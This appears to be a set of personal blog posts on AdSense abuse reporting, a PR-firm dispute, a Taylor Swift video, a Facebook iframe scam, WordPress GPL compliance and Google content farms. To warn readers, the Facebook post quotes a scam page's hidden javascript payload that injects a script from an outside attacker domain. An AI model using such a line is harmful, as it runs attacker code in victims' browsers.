No, really…

I think this may be a sign that I am watching too much The Walking Dead.

By the way, this would look great on you or your boyfriend/girlfriend on a t-shirt!

It has to be tough policing a program like AdSense. It must be exceptionally difficult during the holiday season, when the payoff to running scams grows so much more. It is so tough, in fact, that this year as the holiday shopping season grows near, with Black Friday just a few short days away, that apparently Google has finally decided to say “fuck it”, make it easier on themselves, just remove the ability for anyone to report any violations of the program whatsoever, and allow the scammers to have a field day in the mean time.

While Google may want to give the impression to their stockholders and the public that they have both the search engine spam and advertising program cheaters fully under control, the truth is that they rely quite a bit on reports from the community and consumers for both spam and AdSense violations. For any spam that they find, Google asks people to submit a Google spam report. At this point they require that someone log in before actually filing the report itself. This makes sense, since it helps prevent people erroneously filing large amount of spam reports against their competitors. For the AdSense violations they supply a separate form that does not require a log in, titled simply Reporting a Violation – AdSense Help. Usually I don’t run into offending sites with AdSense on them that fill me with enough of a sense of civic duty where I feel compelled to actually fill out a report, but I happened to land on one such today that actually tricked me into clicking on an ad in such a way that it really did annoy me. The page I landed on was BigSiteofAmazingFacts How Much Does The Earth Weigh (yes, I was distracted by trivial shit again, don’t judge me), and in the right sidebar there was what appeared to be an embedded Youtube Video from Family Guy:

Still distracted (of course) I clicked Play on the video, only instead of playing it suddenly brought me to a site trying to sell me bras. So, thinking I must have missed the rather large video in the sidebar when I tried to click on it, I hit the back button… and noticed that suddenly the video was gone altogether, and where before I had seen 2 AdSense blocks and a video, now there were 3 AdSense blocks instead:

I hit refresh a few times but the video didn’t return. At that point I realized that it was actually a scam, so I cleared my cookies for that domain, hit refresh again, and viola, the “video” reappeared once again. At this point I was sufficiently irked that I actually decided I was going to report this asshole. It’s bad enough that a site with crap content like this is ranking #1 (the weight of the Earth is increasing each year from salt from the ocean spray? Seriously, wtf?), while people with content that is just fine are getting penalized supposedly from the Panda fallout. To add in that the guy who owns the site is ripping off advertisers as well just makes it so much worse. So, I headed on over to the AdSense Violation report to be a good citizen… and I was greeted by this:

An essentially blank page, with only a header, navigation, and a box asking me to tell AdSense how they can improve. Go figure.

From a financial perspective it does make sense for Google to make reporting AdSense violators more difficult, especially during the holidays. People who run scams like this actually generate Google money through the AdSense program, a program which currently has absolutely no oversight. It is exactly this lack of oversight that means that Google is the only one who knows how much, if any, of the advertising dollars are credited back to the advertisers once these scams are revealed. Hiding the violations report means that much fewer sites will be reported, more scams will be able to run for longer periods of time, and more money will wind up in Google’s pockets.

Is this profit motive really the reason that the report form is missing? If you ask Google I am sure they would say “of course not, we’re Google, you can trust us”. And since everything with Google is proprietary “behind closed doors” trade secrets with them, there is no way to know exactly how many violation reports suddenly went missing that apparently no one has noticed yet. My hunch though is that with something like this, as online shopping hits the holiday rush, the lack of reports that are coming in at the moment is actually too big for them not to have noticed by now, and them not fixing it for this long must be at least in some part intentional on their end.

Update: As Jen from JenSense.com pointed out in the comments, there is another newer page available where you can actually file the report located here. However, I am not sure that makes it any better, and may in fact make it worse. I wound up on the empty page by actually going to Google and searching for [report adsense violation]. The page that Jen provided is in the list, but it is down under the blank page that I found, another unhelpful blank page, and underneath a list of discussion of other people looking for the form. This begs the question… why did Google leave an otherwise empty page behind with just enough text (ie. header and title) and all of the old link juice there to outrank the “real” form? If they redesigned the site, then why not 301 redirect the old form(s) to the new one? It’s not like they don’t know how search engines work, ya know?

“True Love means never giving up” – many a stalker were born from this one innocent sounding phrase.

The truth is much less pretty than the actual picture.

[cue elevator music]

Ok, good, you’re back. If you followed some of the aftermath in the comments, on Twitter, and on various media outlets and celebrity blogs around the web (including Gawker and Wil Wheaton), you can tell that Jenny obviously has a large amount of supporters who were less than pleased at Jose Douche Canoe Martinez. The outcry got just loud enough that Brandlink Communications actually started to play the wounded bird card:

Apparently Jose Martinez felt so victimized from the whole experience, he actually decided that he needed to delete his entire Twitter account (or, of course, it could be that he was trying to do the internet equivalent of burning the evidence of his douchiness).

Quick side note: if a PR company’s first instinct when they come under fire is to duck and run, and get defensive, as opposed to owning up, making it right, and the moving on, then odds are that same PR company would not hesitate to throw a client under the bus if they felt it was necessary for their own self preservation. Anyone who is researching this company with the possibility of hiring them should probably keep that in mind.

Either way, I guess Jenny didn’t realize quite how much support she would receive, so she wound up actually asking her followers to put away the pitch forks:

UPDATED: I love you people. Really. Thank you for always having my back and for being so supportive during this weirdness. Jose has apologized, and I’ve been assured by the woman in charge of the company that they are aware and are handling it the best way they know how, so let’s give them some air and let them have the chance to do that. *deep breath* – Jenny Lawson, aka TheBloggess

Ok, so, maybe Jenny is right. Maybe some of her fans did get abusive towards Jose in the process of defending her (which, btw, I did not see myself, but I am guessing not everyone was polite) and it is time for us to let cooler heads prevail. However… I also don’t think this should fall just into internet obscurity, either. People who are looking to hire this PR firm should be able to find out who it is they are dealing with, and the first line of defense when doing research on a company is, of course, Google. Currently when you do a search for [brandlink communications], someone else’s post about Brandlink and TheBloggess is #1 (as a news story though, not as a regular listing), Brandlink Communications themselves show up next (which is actually the natural #1 listing, when no news stories show), and in the natural #10 spot is Jenny herself:

(Click to enlarge)

The news piece is of course only there for a short period of time, as all news pieces should be, and the rankings Jenny’s site has currently are probably also due to what Google refers to as QDF, or Query Deserves Freshness (where a particular search might warrant different results due to topic being “hot” at the moment). However, I think that Jenny’s site should be in the top 10 when searching on that company, even after the buzz dies down… possibly even #1. Therefore, here is what I suggest, if you happen to support Jenny in this issue:

1. Write a post showing your support for Jenny about the way she was treated. Don’t attack or “bully” anyone in the post, because despite them being in the wrong here Brandlink was right, bullying people is still wrong (although calling someone a douche canoe when they actually are one is just being descriptive imo)
2. In that post, link to Jenny’s blog post about the conversation, but use the phrase [brandlink communications] as the anchor text for the actual link.
3. If you link to the post more than once, make sure that link is the first link to the post.

For those of you wondering why, it is because links are still the number one factor Google uses when determining rankings. If you want more information on it, you can Google [santorum] and do some research… just don’t click on the first link.

Do I think this is too harsh? Perhaps if they weren’t a PR company boasting W Hotels and Chase as their clients I might be more inclined to go easy on them. However, even if they weren’t big shots treating those they regard as the “little people” like shit, there is also the fact that this behavior is not new for Jose, and there is evidence of him treating people like this all the way back to early 2006. The fact that the same guy is still VP Media Director 5 1/2 years later, still behaving the same way, makes the promises from the company that is “handling it the best way they know how” somewhat hollow. So yes, with that in mind I think that a response like this is quite fitting. Vote with your links, people, as Google intended you to.

In which Taylor says “um”, “like”, talks like a Scotsman, laughs, and sometimes gets excited. Sure, she said lots of other stuff too… but I didn’t include any of it in this video.

Proof that Taylor can make you smile regardless of what she is saying:

I did not change the order or duplicate anything, I just removed the in-between talking parts. You can view the original video here:

YouTube Presents Taylor Swift

From a technical standpoint probably the hardest part was getting the “ums” separated from the surrounding words, due to the fact that often Taylor speaks quickly in this interview, and some of the words ran together. For instance, many of the “and um” combinations kept coming out as “dumb” when I tried to isolate them, although I think in the end I did a decent job of pulling them all out. I did wind up missing a few I just couldn’t get though.

On a side note, I was looking at some of the comments on the original video, and I was shocked to see that there are some downright Taylor Swift haters out there. I honestly don’t get it. I am not referring to the “oh, I really don’t like her music” type of people, but rather people who what I can only assume are completely consumed by self loathing posting some seriously ugly stuff. Just a heads up in case anyone of that genre finds their way here or comments on the original video, I will simply delete anything that appears to be hate driven from the comments. This video is in no way meant to make fun of Taylor. Many people talk this way, and the interviewer was just as bad.

Facebook has never been known for it’s safety. It is a site designed so that the least Internet savvy people out there can sign up and network with millions of other people, both those they know and those they don’t, with only a minimal amount of technical know-how required (ie. how to sign up, and how to browse). It is a giant playground filled with games and people to talk to from all over the world, luring in droves of people who, when they come, know nothing about “scareware”, or “phishing scams”, or even how to clean a virus from their machine if they get one. Sure, they’ve been told that if they visit porn sites they could very well get a virus, but hey, this is Facebook, everyone is on Facebook… it must be safe. The result is a gigantic community of gullible marks just waiting to be exploited or infected by scammers and hackers.

That is why a couple of years ago I wrote a post on how to prevent getting hacked on Facebook (as well as on Twitter or Myspace). I happen to have quite a few friends and family who are not highly knowledgeable when it comes to the Internet, and through talking to them I came to realize that some of the things I take for granted many people were just not aware of. In the article I went into depth on some of the very basics of Internet security, such as what is the address bar in the browser, and how you needed to be sure you were on the site you thought you were on. That one simple tip could have saved millions of victims of phishing scams, had they just known where to look. Now, some fucking moron developer employed by Mark Zuckerberg has gone and rendered that advice pretty much pointless, at least as far as Facebook is concerned.

For those of you who own WordPress blogs, you are probably aware that if you get hacked one of the biggest dangers to your readers is the iframe hack. For those of you who don’t, or who are not familiar with html, an iframe is an element on a webpage that allows you to embed a second webpage into it. It’s very common and a perfectly normal feature of the html language. Iframes in and of themselves are not dangerous. Google AdSense , when shown on a webpage other than Google, is in an iframe. The same goes for Facebook “Like” buttons. So when you visit a page that has either of those, you are visiting Google or Facebook at the same time. The important thing for webmasters to note is that you only ever embed iframes from sites you trust. The reason this is so crucial is because once you embed an iframe from a site other than your own, you have no control whatsoever over what content is served from that iframe to your visitors. None. Nadda. Zilch.

The reason that hackers like utilizing iframes for hacking is that it allows them to serve malicious code and viruses to people while they are visiting sites that they trust. If you are out there browsing some seedy sites and popups show up telling you to click on a link or that you might have a virus you are much less likely to believe it. It’s simple psychology, and your guard is already up. This is much less true if you are on a site you visit every single day with no problems.

Apparently I missed it when it happened, but a couple of months ago some genius programmer at Facebook decided to introduce a way for people to utilize iframes into Facebook Pages. I only found out about it myself when I discovered one of these pages yesterday. It was a link on a friend’s wall purporting to show pics of Osama bin Laden dead. I could tell right away that it was a scam, so I went to see just how potentially damaging it was. The first thing that struck me was that this was a page actually on Facebook itself, although it was giving instructions to enter in a series of keyboard commands, as if there were Javascript it was trying to get you to trigger. I moused around a bit, and realized there were some hidden forms on the page, which was really odd, so I went ahead and turned off all styles on the page. That’s what I saw what was going on. This is what the page looked like with normal styles turned on:

(click to enlarge)

Clicking that button then revealed these instructions:

What was not revealed, however, was the hidden <textarea> containing Javascript code that would then be fired if you did follow those instructions:

<textarea id="c">javascript:(a=(b=document).createElement('script')).src='//themafiafamily.net/bin/bl.js',b.body.appendChild(a);void(0)</textarea>

This causes a script to be injected from a domain owned by some hacker, themafiafamily.net, and it’s all downhill from there.

Of course, odds are pages like this won’t stay up for too long when they are created. There is a way to report them, and Facebook will eventually take them down once they investigate. However, there is no way to report them in a way that gets them dealt with in a timely manner. There is no “This page is hacking users” option. In fact, if you look at the “Like” counter on that page you can see that it had already hit over 109,000 people by the time I saw it, and who knows how many more before Facebook bothered to respond to the reports about it. Additionally, there is nothing stopping a hacker from running a legitimate page for a few weeks, attracting millions of people, and then deciding to hit them all with a virus afterwards.

The bottom line is that Facebook not addressing these issues and removing the ability to embed iframes borders on negligence. Currently the FTC goes after companies and organizations that do not adequately protect their user’s data:

Maybe they should start taking a look at companies that don’t adequately protect the actual users as well.

From: Michael VanDeMar <michael@endlesspoetry.com>
To: license-violation@gnu.org
Subject: GPL Violation

Hello,

I would like to report a violation of the GPL v2 license by the Worpdress Foundation with their blogging platform script, WordPress. There is an MIT license violation in the same product, which may make it 2 violations under your jurisdiction since they are mixing licenses and then licensing the whole as a single GPL product. The current version of the package , which is 3.0.5, can be download from here:

http://wordpress.org/download/

There is a binary included in the package that has neither the source code nor a written offer to provide it included with the package itself. This has been been the situation since version 2.5, which was released in March 2008, and all versions have been in violation since then, and all are still available from their website here:

http://wordpress.org/download/release-archive/

The binary file in question is located, sans source code or written offer for such, in the following directory of the distribution package, in both the zip and tarball archives:

/wordpress/wp-includes/js/swfupload

The file is named swfupload_f9.swf in WordPress 2.5 and simply swfupload.swf in WordPress 3.0.5. There may have been other name permutations included in the various releases over the years. Additionally, that particular binary is licensed under the MIT license, but there is no license accompanying the file. Also missing appropriate licenses are the following components:

/wordpress/wp-includes/js/imgareaselect (dual MIT and GPL)
/wordpress/wp-includes/js/jcrop (MIT)
/wordpress/wp-includes/js/jquery (dual MIT and GPL)
/wordpress/wp-includes/js/thickbox (MIT)

This has been reported to the developers via their bug tracking system. However, they are arguing that they are not required to follow the terms set forth in those licenses:

http://core.trac.wordpress.org/ticket/16517

I have done a writeup on the issue here, and you can further see the developers arguing their point in the comments section:

http://smackdown.blogsblogsblogs.com/2011/02/18/as-it-turns-out-wordpress-itself-is-not-100-gpl-compliant-after-all-and-they-violate-the-mit-license-as-well/

In addition to submitting this report it would be appreciated if some opinion on the WordPress developers claims about why they are not required to comply with those sections of the GPL could be given, and if they are indeed in error, why. Also appreciated would be an opinion on the impact, if any, of any derivative works based on those improperly licensed versions of WordPress.

Please feel free to contact me if you need any further details. Thank you.

-Michael VanDeMar

After I sent it I realized that I needed to clarify why I was writing them, since the FSF is obviously not the copyright holder of the various scripts that are in violation, so I sent this as well:

From: Michael VanDeMar <michael@endlesspoetry.com>
To: license-violation@gnu.org
Subject: GPL Violation

Hello,

By the way, I understand that the FSF is not the copyright holder on WordPress. However, they are claiming that they only offer products that are 100% GPL on their website which is apparently not true. Since the FSF is the copyright holder of the actual GPL license, and WordPress is one of the most publicly visible GPL proponents out there, I do feel strongly that this affects you as well. Even if legally there is no recourse for you to force them to abide by the terms of the GPL your input in this situation is valuable.

-Michael

And I do feel strongly about this. I think the attitude that supplying the actual source code isn’t the essence of and absolutely required for something to even be considered GPL in the first place is ridiculous. I will update this post with whatever response, if any, I receive.

Curiosity piqued, I dug back through the tweets until I found a link to the thread Ben was referring to. It turns out that it is a bug report on the WordPress bug tracking system, opened by user “hakre”:

The wordpress software packages to download form the website contain mostly source-code.

But as it’s known, there are files and parts in these, that are binary blobs and w/o their source as specified in the terms of the GNU GPL.

According to §1, §2 and §3 of the terms of the GNU GPL v2, the wordpress project must offer full source-code in order to distribute the whole package under GPL.

In §3 it’s made more specific what sources are:

The source code for a work means the preferred form of the work for making modifications to it. For an executable work, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the executable. However, as a special exception, the source code distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable.

I was looking over the wordpress homepage but I could not find any information where to obtain the according sources that are missing from the packages – either in full source packages or in it’s additional form.

Probably I’ve overlooked something, please help me obtaining such information. – hakre

What hakre was referring to was a specific section of the GNU General Public License v2.0, which is the license that WordPress is released under. The requirements of the license dictate that anyone is free to modify or redistribute the software package, as long as the license itself stays intact, and as long as whoever receives the software package either gets a copy of the source code, an offer in writing that they will make the source code available on request, or a copy of the offer to make said source code available if that is how it was originally offered. Basically either the actual source code must be supplied, or a clear concise guarantee that it can be supplied on demand, must be included with the distribution. For the bulk of WordPress this is no problem and would never be an issue. The core WordPress files are written in php, with some elements in Javascript or html. All 3 of those languages, unless encoded in some special way, run as is straight from the source code. Php and Javascript are “scripting” languages and html is not actually a programming language. If someone wants to see or edit the “source code” for any of those files all they need to do is open them in a text editor and just look at them.

However, what hakre was talking about was the 1 and only executable file* (see hakre’s comment below for clarification) that is currently distributed with WordPress, a file named swfupload.swf, which is located in the wp-includes/js/swfupload directory. It is a Flash file, is not considered editable by normal means, and it is compiled, not in source code form. The concern that hakre raises is quite valid, since without the source code being distributed along with this file it makes it impossible to distribute WordPress as GPL v2 software. This is a Very Big Deal, especially when you consider the rift that Matt Mullenweg created in the WordPress community over the whole issue of what GPL did and did not cover. Almost 2 years ago Matt asked a lawyer from the FSF to back up what Matt was saying, and in the closing paragraph of that post he made the following statement:

So as before, we will only promote and host things on WordPress.org that are 100% GPL or compatible. – Matt Mullenweg

The fact that WordPress can’t follow the license that they are claiming everyone else needs strict adherence to makes all of Matt’s previous pettiness just that much worse.

One of the WordPress contributers, Otto42, closed the ticket when he found it. In fact, he asked the question “What sources are missing?” in the same post, but marked the ticket as “invalid” without bothering to wait for an answer. The thread was then reopened by hakre again, after which Chip Bennett joins the conversation. In a nutshell, it’s a back and forth with Otto arguing that the source code for that file is not required, since WordPress authors did not write it, and since that particular executable is not GPL, and is instead released under the MIT License. The problem with his argument is that it is, of course, dead wrong. The GPL license does indeed allow you to distribute non-GPL licensed software within a GPL package, as long as a) the non-GPL license is less restrictive than the GPL (which the MIT license is), and b) the source code is included (which, again, WordPress is not doing here).

At one point Otto makes the following claim:

As for the GPL, we are under no obligation to provide anything at all. Understand that the people here wrote the code and share a joint ownership of it. The GPL places no obligation whatsoever on the actual copyright holders of the code. They can release it anyway they like. The GPL only applies to licensees of the code in question; the downstream people using and redistributing that code. – Otto42

That of course sums up a bigger core misunderstanding of the situation that makes me wonder if more WordPress contributers are under the same illusion… that the GPL only applies to what other people can do with WordPress, and doesn’t actually apply to the contributers, or to the WordPress Foundation, or to Matt Mullenweg. Maybe all of Matt’s talk of how the GPL embodies all of WordPress’s core values managed to bury the reality of why the GPL was being used for WordPress. The truth is, WordPress is licensed under the GPL v2 because they have no choice in the matter, they have to use it. WordPress, you see, is a derivative of yet another software package, b2/cafelog, which was licensed under the GPL v2 as of March 2nd, 2002.

Otto also is also under the misconception that the following statement in the license covers them:

If distribution of executable or object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place counts as distribution of the source code

As a developer I am rather surprised at Otto’s lack of grasp on the IF…THEN… element to that statement. If the executable is being distributed from a remote location, then offering the source at that same location counts as distribution of the source code. An example of an executable being offered from a designated place would be Microsoft distributing software that requires their mfc32.dll to run, and giving you a link to their website where that can be downloaded. WordPress does not say “To use our Flash uploader you will need to download the executable from here“… they distribute that executable with the WordPress package itself, which means, by the terms of the GPL license they are required to follow, that they must offer the source code as well.

The final argument in the bug report relies on the fact that inside one of the Javascript files that are bundled with SWFUpload there several links referenced, and if you follow one of those links and dig around you will eventually find the source code in question. Even this, however, is not actually sufficient. As Otto points out in several places during the discussion, SWFUpload is not in and of itself GPL, and are under no obligation to offer the source code. Therefore that site could disappear altogether and the source code would no longer be available. A link that is not a direct download being mentioned in a Javascript file is not even close to WordPress offering a place for people to download the source code.

Otto is right in one respect though, the flash file in question is under the MIT License. This license is short and sweet, and in it’s entirety reads:

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the “Software”), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED “AS IS”, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

That middle line in the license, “The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.”, is non-trivial. It plainly states that a copy of this license must be included with the software. It does not say that “a copy of the notice or a link to it” is required, it clearly states that the notice itself needs to be there… and this notice just happens to be missing from the copy of the software distributed with WordPress. It also happens to be missing from from the thickbox package that is found in wp-includes/js/thickbox as well. The fact that either copy of the license was missing from wherever the WordPress developer who included it in the package got it originally is no excuse for WordPress being non-compliant, either. It is Matt Mullenweg’s responsibility, as the distributor, to ensure that all of the licenses are in line.

There is no question, ever since WordPress included the SWFUpload software without it’s source code, which as near as I can determine started in version 2.5, they have been in clear violation of the very license they have been bashing other people over the head with. Fixing it now will not change the fact that they violated it for years, either. There really is no excuse for this.

Update: I just wanted to include a section in the GPL FAQ that I missed before that is strongly relevant to this discussion, “I downloaded just the binary from the net. If I distribute copies, do I have to get the source and distribute that too?”

Yes. The general rule is, if you distribute binaries, you must distribute the complete corresponding source code too. The exception for the case where you received a written offer for source code is quite limited.

Honestly, it doesn’t get any clearer than that. Mind you, that won’t stop people from trying to argue the point further, but the FSF themselves are very succinct on that point. SWFUpload is a binary that the WordPress developers downloaded from somewhere else and included in their package, the GPL requires that the source code be included. WordPress has been in violation of the GPL for a few years now at least.

As “pure webspam” has decreased over time, attention has shifted instead to “content farms,” which are sites with shallow or low-quality content. - Matt Cutts

Whoa. This, especially coming from Matt Cutts, is huge. For those who don’t know, “content farms” are organizations that generate websites composed of large amounts of low cost “fluff” or filler content, with little to no regard to quality. The content is generated not based on having information and the desire to share it, but rather in response to queries that might get typed into a search engine, and are built for search spiders rather than human consumption. They include companies like Demand Media, Mahalo, and Associated Content.

Historically speaking, Matt has pretty much refused to come right out and say that these content farms were indeed spam, despite the fact that they clearly violated Google’s quality guidelines:

Doorway pages are typically large sets of poor-quality pages where each page is optimized for a specific keyword or phrase… Google’s aim is to give our users the most valuable and relevant search results. Therefore, we frown on practices that are designed to manipulate search engines and deceive users by directing them to sites other than the ones they selected, and that provide content solely for the benefit of search engines. Google may take action on doorway sites and other sites making use of these deceptive practice, including removing these sites from the Google index. - Google Webmaster Tools Help

Regardless of the very clear wording of their policies, Google has to date not banned any of these content farms for their violations. In fact, quite the opposite – Matt has in the past even defended these sites, and in Mahalo’s case at least given warnings to them which he then allowed them to ignore. He alluded to the fact that one of the algorithm updates from last year, Mayday, was supposed to help filter out “really kind of lower quality” sites, and many people thought he must be talking about content farms back then, but alas that turned out to be a bust. So when he comes right out and says, hey, you’ve waited long enough, now we’re going to target content farms for reals, y’all, then yeah, that’s a Pretty Big Deal.

Now, Richard Rosenblatt, the CEO of Demand Media, may be may be in denial about his company being a content farm, but that definition has existed for quite some time, and regardless of what you call it low quality content built specifically for search engines is in violation of Google’s guidelines. However, he still persists in his belief that as long as you can get some people to call it something else, his “partnership with Google” will keep them protected regardless of what happens:

This is why our partnership with Google makes sense. 1) We help them fill the gaps in their index, where they don’t have quality content. 2) We’re the largest supplier of all video to YouTube, over two billion views and 3) we’re a large AdSense partner. So our relationship is synergistic, and it’s a great partnership. And it’s a partnership that we’re excited to continue to expand. - Richard Rosenblatt, attempting to give Google’s PR team a heart attack

I am guessing that Mr. Rosenblatt missed the section in Matt’s post where he very specifically discussed the fact that no special partnerships would protect the content mills from these changes:

One misconception that we’ve seen in the last few weeks is the idea that Google doesn’t take as strong action on spammy content in our index if those sites are serving Google ads. To be crystal clear:

• Google absolutely takes action on sites that violate our quality guidelines regardless of whether they have ads powered by Google;
• Displaying Google ads does not help a site’s rankings in Google; and
• Buying Google ads does not increase a site’s rankings in Google’s search results.

– Matt Cutts, being crystal clear

Then Friday rolls around, and Matt announces that these changes already happened earlier in the week. If you didn’t notice any changes, then that’s probably because, according to Matt, less than half of a percent of queries would show any perceptible ranking differences. If you didn’t notice any changes in queries involving content farms, well… as near as I can tell that is because there weren’t any. In fact, in his announcement post Matt doesn’t even use the phrase “content farms” at all, and instead only discusses that the net effect of these changes is that in cases where content was scraped, searchers are more likely to see the original content first. He then thanks Jeff Atwood (one of the ones who wrote a story discussing Google’s decline in quality that had a large audience) and Stack Overflow’s team (a site that Jeff co-founded) for their feedback. A few people asked about the omission in the comments, but as of yet anyway Matt has not replied to any of them.

As to the results themselves, for the most part I am seeing what I was seeing before, so that “less than half of a percent” doesn’t surprise me. If you search for [mcdonalds coupons] the #1 site is still a Mahalo page that doesn’t actually have any coupons on it, and very little original content. If you search for [mcdonalds free salad coupons] you get a different Mahalo page that does actually have a picture of a coupon on it (good only in Canada, and expired in July 2010, however), and if you search for [mcdonalds happy meal coupons] the second listing is a Mahalo page, again with no coupons on it. These pages are filled with riveting dialog, such as the section labeled “McDonalds Happy Meal Coupons Coupon Policies,” which states:

The policies for McDonalds Happy Meal coupons may have certain restrictions and these might include not being able to combine discounts or limiting the period of use. Make sure you read and understand the instructions listed on the coupon carefully to ensure that you know when the coupon will become valid and when it will expire as well as what special restrictions apply. Also included in this information will be which product or products the coupon can be used to purchase. Insuring that you understand the coupon policy can help you to avoid any mistakes during the checkout process. - Content Mahalo actually paid for

Seriously?

It’s not just Mahalo, of course… type in [how to reset your blackberry] and you will find ranking just fine a page from eHow that is nothing more than the phrase “hit alt+right-shift+delete” wrapped in light, fluffy filler content. I also still see queries where the duplicate content outranks the original, such as the copy of a Wikipedia page that ranks #1 for [elvett semic]. The changes, whatever they were, truly are barely (if at all) perceptible. The change was so small that one of Matt’s readers asked, “I’m wondering why announce it if you’ve gotten the feedback and the algorithm update would presumably be of such little consequence that no one would likely notice or comment on it unless you told everyone.” Indeed, why make such a big deal out of something when almost no one can tell the difference?

To answer that you need to take a look at exactly what it was that did change. When I search in Google now for questions that were asked on Stack Overflow, at least for the queries I checked, I now see SO ranking instead of sites that scrape their content. This is of course how it should be, and the main concern that the people from that community were bitching giving feedback about to Matt. Stack Overflow is, as I mentioned, the site that was co-founded by Jeff Atwood, who is the author of the much quoted post that generated quite a bit of buzz about Google’s decline in quality. Many of the frequenters of Stack Overflow are also regulars on Hacker News which (not so) coincidentally Matt decided to hold a good portion of the discussion about these changes, both before and after they were implemented. While the HN and SO communities in and of themselves might be tiny compared to the web as a whole, the fact is that their voices do carry within the online community. Start buzz there about Google showing quite a bit of improvement and it has a very good chance of spreading, even if the data set demonstrating that is overall quite small. Add to that the fact that Richard Rosenblatt, CEO of Demand Media knows that the changes aren’t targeted at his company (and when asked if Google had discussed the changes with him, replies “I can’t comment on that.”), and then toss in Jason Calacanis’s ingratiating comments on Matt’s blog post about the changes going live:

It was clear that Mahalo was getting grouped into the “content farm” space… - Jason Calacanis

No kidding? Really? Past tense there, eh Jason?

So Matt loosely ties the concepts of “content farms” and “scrapers” together in a blog post on the official Google Blog, and claims that they are taking action against them. He then announces a change that appears to only affect scraper sites, and furthermore only those scraping a specific dissatisfied community, publicly thanks that community for their help, and then doesn’t mention the phrase “content farm” again. Even though the changes were practically non-existent, there is a good chance that the overall impression from those who don’t look too closely is that action was indeed taken, and that if what were formerly referred to as content farms are still ranking well, then obviously they must be there for a reason.

From a strategic standpoint it’s actually rather clever. If I were Google and I needed to conceal special relationships I had with companies (especially if I was thinking that the FTC might want to get involved in my business) then I too would probably try very hard to sway the public opinion about the labels attached to the sites those companies owned, and shift the focus to something I could fix without caring about the damage, and then crowd source a tech community to help spread the impression that things were better. Most people probably won’t even pay enough attention to notice.

(click to view original)